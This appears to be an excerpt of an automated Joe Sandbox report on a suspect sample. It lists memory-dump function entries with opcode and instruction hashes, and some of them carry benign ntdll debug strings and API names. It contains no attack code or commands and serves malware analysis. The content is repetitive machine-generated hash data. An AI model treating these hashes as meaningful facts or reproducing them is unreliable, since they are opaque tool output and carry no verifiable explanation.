                                                          • Opcode ID: af7eff25815665e647eae158285133fa9bdeaadc2c0bacc0f865d082c0e7f9c5
                                                          • Instruction ID: de6573a4a9078b4e406aa8362a8f2966da5cd900a4ea0951955b24e29943fac8
                                                          • Opcode Fuzzy Hash: af7eff25815665e647eae158285133fa9bdeaadc2c0bacc0f865d082c0e7f9c5
                                                          • Instruction Fuzzy Hash: E9900231A0580022A140715888885464005A7E0301B55C022E0824554CCA148A565375
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 84a52e52a310fcb588ae3119b2eef1a0e47778d7aaaefc9436332f265c6dde20
                                                          • Instruction ID: 8e8fc0faad6587dcd220d760092c8312067f2622f6174ba181359c82645df74e
                                                          • Opcode Fuzzy Hash: 84a52e52a310fcb588ae3119b2eef1a0e47778d7aaaefc9436332f265c6dde20
                                                          • Instruction Fuzzy Hash: 7B900261A01500525140715888084066005A7E1301395C126A0954560CC6188955937D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6a1e15c5a471ec700aebaded2adaaef675aad3938455c897ca2d9419042a6cb5
                                                          • Instruction ID: fbd4595d8d98dc4823e6b7fa795c94fc3cf9e210ec35e1e27091093a661dc368
                                                          • Opcode Fuzzy Hash: 6a1e15c5a471ec700aebaded2adaaef675aad3938455c897ca2d9419042a6cb5
                                                          • Instruction Fuzzy Hash: 3290023160140812E10471588808686000597D0301F55C022A6424655ED66589917235
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 171cdb7fa661d662a9a7d590e99550cfb66a92477c11c9708ca446989267cb31
                                                          • Instruction ID: ecd196c31f07090079351baa6229f46c4dfb0e774d625becd41f4b07ff39f8a0
                                                          • Opcode Fuzzy Hash: 171cdb7fa661d662a9a7d590e99550cfb66a92477c11c9708ca446989267cb31
                                                          • Instruction Fuzzy Hash: FF900231A0540812E15071588418746000597D0301F55C022A0424654DC7558B5577B5
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 20c7588831c9b253badace2f9aad28c45a8eb5ff828d4e235f4aed99ea43835e
                                                          • Instruction ID: 57d06401c4779c69895fd1166623928b267a743db467c1a45a6a6e59a42e87b2
                                                          • Opcode Fuzzy Hash: 20c7588831c9b253badace2f9aad28c45a8eb5ff828d4e235f4aed99ea43835e
                                                          • Instruction Fuzzy Hash: E790023160544852E14071588408A46001597D0305F55C022A0464694DD6258E55B775
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1ed2371f8ade77eef04133f4308f6890f92e0d98d5f693a7152e0fb02672b198
                                                          • Instruction ID: ce63e0f18388df2b3c73e187e18fcf80fe50f5afce2a059a52a653d591799216
                                                          • Opcode Fuzzy Hash: 1ed2371f8ade77eef04133f4308f6890f92e0d98d5f693a7152e0fb02672b198
                                                          • Instruction Fuzzy Hash: AE9002A1601540A25500B258C408B0A450597E0201B55C027E1454560CC52589519239
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3b5524216bc8cdd8dc3157f7e034b1a09af3c313fb22d6e812a0f30b3697b32a
                                                          • Instruction ID: 3d763d33acf7803b0daa32cb5d7d5a1af4946586dbd31b795d15574410e604fa
                                                          • Opcode Fuzzy Hash: 3b5524216bc8cdd8dc3157f7e034b1a09af3c313fb22d6e812a0f30b3697b32a
                                                          • Instruction Fuzzy Hash: 8B900225621400121145B558460850B0445A7D6351395C026F1816590CC62189655335
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d984f2cd811721335730cf52790025e299a4b5cc2b4dce5a149ef01f836f0a2a
                                                          • Instruction ID: f167e1e4bb9cfe38469021686104d2c9290ddd6089b4714fb22f8dc8cf9da0b8
                                                          • Opcode Fuzzy Hash: d984f2cd811721335730cf52790025e299a4b5cc2b4dce5a149ef01f836f0a2a
                                                          • Instruction Fuzzy Hash: 9990022160544452E1007558940CA06000597D0205F55D022A1464595DC6358951A235
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1b5564f42f8c49873f3f9930285dbc833e2138dc1f504d7a50bb0f7d7d106092
                                                          • Instruction ID: 0322bda15f6344688a8e2b5595d39707d7542f3bffd3fb2dfe1bad67efbe7b03
                                                          • Opcode Fuzzy Hash: 1b5564f42f8c49873f3f9930285dbc833e2138dc1f504d7a50bb0f7d7d106092
                                                          • Instruction Fuzzy Hash: EE90023164140412E141715884086060009A7D0241F95C023A0824554EC6558B56AB75
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f0455016e875e06b7a013bb19dcac631eb28bb4b5f1c96e95288654c25d7d7a6
                                                          • Instruction ID: b8dffea3ff0156b89e124b6e681c7e6f4d4009f1f97380fbc85c15ad406f9134
                                                          • Opcode Fuzzy Hash: f0455016e875e06b7a013bb19dcac631eb28bb4b5f1c96e95288654c25d7d7a6
                                                          • Instruction Fuzzy Hash: 2D90023160140852E10071588408B46000597E0301F55C027A0524654DC615C9517635
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 268f162be98ae1cf19e2028022334494013711904055a6394affb1de53427459
                                                          • Instruction ID: e227aad976642df975dd868ceb32663ea96eb617b134bbe74a8858a5b117c28c
                                                          • Opcode Fuzzy Hash: 268f162be98ae1cf19e2028022334494013711904055a6394affb1de53427459
                                                          • Instruction Fuzzy Hash: 37900221A0540412E1407158941C706001597D0201F55D022A0424554DC6598B5567B5
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 74eb0ddddc0beb709880b1d8d1585397f5011c395899def6025b7016f9af20a7
                                                          • Instruction ID: 968a50b1d75c8f2fa4d876d657154686f161bf429a2bf50284621313d0f9d0ce
                                                          • Opcode Fuzzy Hash: 74eb0ddddc0beb709880b1d8d1585397f5011c395899def6025b7016f9af20a7
                                                          • Instruction Fuzzy Hash: 2990023160140413E1007158950C707000597D0201F55D422A0824558DD65689516235
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 627d4d1912e51a5aaa71af1a02cab73e9830bb4d5d3ee321171cc915430d1efd
                                                          • Instruction ID: 44fad74e158b8bdec444134b147c268e036ec570b6aec28ff6a904e9d770e069
                                                          • Opcode Fuzzy Hash: 627d4d1912e51a5aaa71af1a02cab73e9830bb4d5d3ee321171cc915430d1efd
                                                          • Instruction Fuzzy Hash: C990026161140052E10471588408706004597E1201F55C023A2554554CC5298D615239
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 51f63f636cb396dedcbff55ae322a695e1d2e9fe0832c671e8155d11017b4a10
                                                          • Instruction ID: ee64783639d75faafcd1496569d6ada7f2b740373e44dc8ddb7a8aa6f2cd02d0
                                                          • Opcode Fuzzy Hash: 51f63f636cb396dedcbff55ae322a695e1d2e9fe0832c671e8155d11017b4a10
                                                          • Instruction Fuzzy Hash: 1E90023160180412E1007158880C747000597D0302F55C022A5564555EC665C9916635
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 713759fdb3411dea4c220a71bf2b44cf69f5713be2344f5bc2f7fddc9b808fe3
                                                          • Instruction ID: f84665119909713507070ba9ae9df6c421b816be52ed6f988dbc5f47c7bfb7f3
                                                          • Opcode Fuzzy Hash: 713759fdb3411dea4c220a71bf2b44cf69f5713be2344f5bc2f7fddc9b808fe3
                                                          • Instruction Fuzzy Hash: 6F90022170140412E102715884186060009D7D1345F95C023E1824555DC6258A53A236
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a071861ee409042fa3cdd6f6d4d3474ec3ed4b5cadd63558b9947f18e5ff7360
                                                          • Instruction ID: 314d3ee337876e3766c9eac76f04b06ff2cbeff3a1cdd3eea2201bc4259d3a3d
                                                          • Opcode Fuzzy Hash: a071861ee409042fa3cdd6f6d4d3474ec3ed4b5cadd63558b9947f18e5ff7360
                                                          • Instruction Fuzzy Hash: 5E90026160180413E14075588808607000597D0302F55C022A2464555ECA298D516239
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fd33ac3044792a9890e82f291a303dca01edb847f5f6eaaf5ee2111a938f3406
                                                          • Instruction ID: 0d230f28c09aa299b0629e421c92af7fbdb4a4a05aab70aef5938a7e607aec17
                                                          • Opcode Fuzzy Hash: fd33ac3044792a9890e82f291a303dca01edb847f5f6eaaf5ee2111a938f3406
                                                          • Instruction Fuzzy Hash: C090022160184452E14072588808B0F410597E1202F95C02AA4556554CC91589555735
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9c5d074c98410b5b5b13f61568548ffb3c075cc57812279f2e5b4c0f0c5de68d
                                                          • Instruction ID: 191113fd4ccb7ebeab7d945aed8436c2c7f70cb65d6181405afa89fb81d388fe
                                                          • Opcode Fuzzy Hash: 9c5d074c98410b5b5b13f61568548ffb3c075cc57812279f2e5b4c0f0c5de68d
                                                          • Instruction Fuzzy Hash: 8590022164140812E1407158C4187070006D7D0601F55C022A0424554DC6168A6567B5
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9c0d891bc838e2f118b9eebf6233d863dcc56b12758b6ccc4d787dc86be0817f
                                                          • Instruction ID: de9d99b20610e14d02c56afc1bb0be627980926157333f03cc5df5aab0985d0f
                                                          • Opcode Fuzzy Hash: 9c0d891bc838e2f118b9eebf6233d863dcc56b12758b6ccc4d787dc86be0817f
                                                          • Instruction Fuzzy Hash: B7900231A0550412E10071588518706100597D0201F65C422A0824568DC7958A5166B6
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 515af0d1e341be64ea8d3ee256d9ec61601772433a08784c01fefcb78e3a8a07
                                                          • Instruction ID: 47db6235e42f3649182fe71f096440e10a50cb57d36a7e30bcc7559e954a6442
                                                          • Opcode Fuzzy Hash: 515af0d1e341be64ea8d3ee256d9ec61601772433a08784c01fefcb78e3a8a07
                                                          • Instruction Fuzzy Hash: B790022164545112E150715C84086164005B7E0201F55C032A0C14594DC55589556335
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ea88234336256f33c417a336603690c9e2ce98ec76da780e1ae25df9b9cb5b5a
                                                          • Instruction ID: 1776a962592776eb44b0522fb2179cb50c525cd918bd73367d113fa4d0a0d99d
                                                          • Opcode Fuzzy Hash: ea88234336256f33c417a336603690c9e2ce98ec76da780e1ae25df9b9cb5b5a
                                                          • Instruction Fuzzy Hash: AA90023160240152A54072589808A4E410597E1302B95D426A0415554CC91489615335
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 557bf1acfbeabbbcc12cde061daa76e18049c7dd08574a084e8c5557ddd2f903
                                                          • Instruction ID: 45dd00e2a9df12fbda12d74cb276c2c191e3f28404d9e0cadf7ca29744b86ab3
                                                          • Opcode Fuzzy Hash: 557bf1acfbeabbbcc12cde061daa76e18049c7dd08574a084e8c5557ddd2f903
                                                          • Instruction Fuzzy Hash: 2390023560140412E51071589808646004697D0301F55D422A0824558DC65489A1A235
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction ID: 88d5b39d2a2274618ce46fc13efde132462e7ce9333afcc162b23dd6d63b7b9b
                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction Fuzzy Hash:
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: f72695d306db84acef1a9ff49cdd4d6e633c74352e15a6769e1e6ff53aa8ecd8
                                                          • Instruction ID: ed07a0f822ee1976867ba5b7c54f31f447c9a4e6b7cca1072831b6a529b7be02
                                                          • Opcode Fuzzy Hash: f72695d306db84acef1a9ff49cdd4d6e633c74352e15a6769e1e6ff53aa8ecd8
                                                          • Instruction Fuzzy Hash: A451C3A2B00116BEDB21DB9C8C9097EFBF8BB49240B148269F5E5D7645D334DE509BE0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: 3281313f3461557c06dcaec25a14c42d9e9bbea946a91aca1457a0675be2d9d6
                                                          • Instruction ID: 48d1b48265297b3e92c55aafa5229d76fea0d0478c0f0aa4b7f319adadb4ff1a
                                                          • Opcode Fuzzy Hash: 3281313f3461557c06dcaec25a14c42d9e9bbea946a91aca1457a0675be2d9d6
                                                          • Instruction Fuzzy Hash: 9D511671A00746AECB71DF9CC99097FBBF8EF44200B448499F9D6D7645EA74EA40C760
                                                          Strings
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01094742
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010946FC
                                                          • ExecuteOptions, xrefs: 010946A0
                                                          • Execute=1, xrefs: 01094713
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01094725
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 01094787
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01094655
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          • Opcode ID: 1fc28e852e6758838fec64a4f39c28cda9504887855e49b450e67a1e7165e875
                                                          • Instruction ID: e71105037a0be61703b01e1805b4025433e421cc7a696d503c666a463bdfd643
                                                          • Opcode Fuzzy Hash: 1fc28e852e6758838fec64a4f39c28cda9504887855e49b450e67a1e7165e875
                                                          • Instruction Fuzzy Hash: C8510C3160021EAAEF51AAA8EC95FEE77ECFF18300F4400D9DA85A7181D7719E41DF61
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                          • Instruction ID: 4c2c7c0c243ccb2e654b97c7cee7183746f7048215303f5a479f7f30e6d7c3fd
                                                          • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                          • Instruction Fuzzy Hash: CD022471508342AFD345DF18C495AAFBBE5EFC8700F04896DFA854B660DB32E945CB82
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-$0$0
                                                          • API String ID: 1302938615-699404926
                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction ID: 721eff7e79d749c3f495dec3fca96552ccf3a78f04f57fc4a215e313ce91551d
                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction Fuzzy Hash: C381C0B0F0524A8EEF258E6CC8517FEBBE9BF45320F184199E9D1E7291C7388941CB51
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$[$]:%u
                                                          • API String ID: 48624451-2819853543
                                                          • Opcode ID: 8f868d2bc68997fd58019c0286bb8d971ff60507b476b0c5c85b069ab9740d7c
                                                          • Instruction ID: 5981ecc56c05ed84e82438488df9770dac549c91e1a899e4a0e93952c556eaac
                                                          • Opcode Fuzzy Hash: 8f868d2bc68997fd58019c0286bb8d971ff60507b476b0c5c85b069ab9740d7c
                                                          • Instruction Fuzzy Hash: 3E21657AE00219ABDB11DF79CC50AFEBBF8EF64650F044156E995E7204E730DA418BA1
                                                          Strings
                                                          • RTL: Re-Waiting, xrefs: 0109031E
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010902E7
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010902BD
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                          • API String ID: 0-2474120054
                                                          • Opcode ID: eb942337e1265301caf45290d5447296c47013be6fe2e7b611fe358de621fdb0
                                                          • Instruction ID: bd40fcdef8b8e8603ca8bb7e988f8e04e583d84c127cbe5fd2304cdc3449cc58
                                                          • Opcode Fuzzy Hash: eb942337e1265301caf45290d5447296c47013be6fe2e7b611fe358de621fdb0
                                                          • Instruction Fuzzy Hash: F5E1A0B06047429FEB65CF2CC894B5ABBE4BB48314F144AADF5E58B2D1D774D844CB42
                                                          Strings
                                                          • RTL: Re-Waiting, xrefs: 01097BAC
                                                          • RTL: Resource at %p, xrefs: 01097B8E
                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01097B7F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 0-871070163
                                                          • Opcode ID: 6ab870f9da9b5f21673212a55109b358736aff2e56ae038b98e12a5879a9797f
                                                          • Instruction ID: 235d1bf9eefa929d499ab06d09a1c6ef04eefc231be13671a53b69f869bc2e79
                                                          • Opcode Fuzzy Hash: 6ab870f9da9b5f21673212a55109b358736aff2e56ae038b98e12a5879a9797f
                                                          • Instruction Fuzzy Hash: A941E3327007029FDB61DE29C850B6BB7E6EF98710F100A5DF9DA9B280DB71F8058B91
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0109728C
                                                          Strings
                                                          • RTL: Re-Waiting, xrefs: 010972C1
                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01097294
                                                          • RTL: Resource at %p, xrefs: 010972A3
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-605551621
                                                          • Opcode ID: b1fd29d3aab43a3dce223c6850260e0121c9030067d37eafc469c61d37627de9
                                                          • Instruction ID: e561b53bfa97663e5bfc7299a16b2a24c08b48846ea40736c96fe4f6c02a8ae0
                                                          • Opcode Fuzzy Hash: b1fd29d3aab43a3dce223c6850260e0121c9030067d37eafc469c61d37627de9
                                                          • Instruction Fuzzy Hash: 2641F432710206ABDB21DE69CC41BAABBE6FF54710F104659FDD59B280DB21F8119BD1
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$]:%u
                                                          • API String ID: 48624451-3050659472
